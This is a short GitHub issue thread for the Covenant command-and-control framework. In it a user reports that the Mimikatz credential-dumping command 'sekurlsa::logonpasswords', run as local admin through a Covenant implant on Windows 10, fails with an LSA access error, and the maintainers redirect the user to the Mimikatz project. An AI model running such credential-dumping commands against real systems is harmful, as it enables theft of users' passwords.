### ISSUE TITLE
[Bug|Feature Request] Short Description of Issue

### ISSUE THREAD

**Issue by revronja** [cobbr/Covenant#275]
**Feature Request or Bug**
Feature Request | Bug

**Describe the feature request or bug**

Mimikatz error.

       [12/19/2020 4:28:12 PM UTC] Mimikatz completed

      (beh) > Mimikatz privilege::debug sekurlsa::logonpasswords
       .#####.   mimikatz 2.2.0 (x64) #17763 Apr  9 2019 23:22:27
      .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
       ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
        ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
        '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
        '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

      mimikatz(powershell) # privilege::debug
      Privilege '20' OK

     mimikatz(powershell) # sekurlsa::logonpasswords
     ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list

  
**Covenant Server Information:**
 - Docker or Native: [e.g. Native]
Kali Linux
Native
Using the latest Covenant, pulled it fresh today.

**Browser Information:**

**Target Information (System that implant is running on):**
 Windows 10
version 1903
18362.1256
**Additional context**

running a grunt with high integrity as a local admin shell on the target.

**Comment by serain** [comment]
@revronja can you please fix the title here

**Comment by cobbr** [comment]
Looks like this is an issue with Mimikatz, Covenant seems to be working okay here. I'd recommend taking it up with the Mimikatz project.
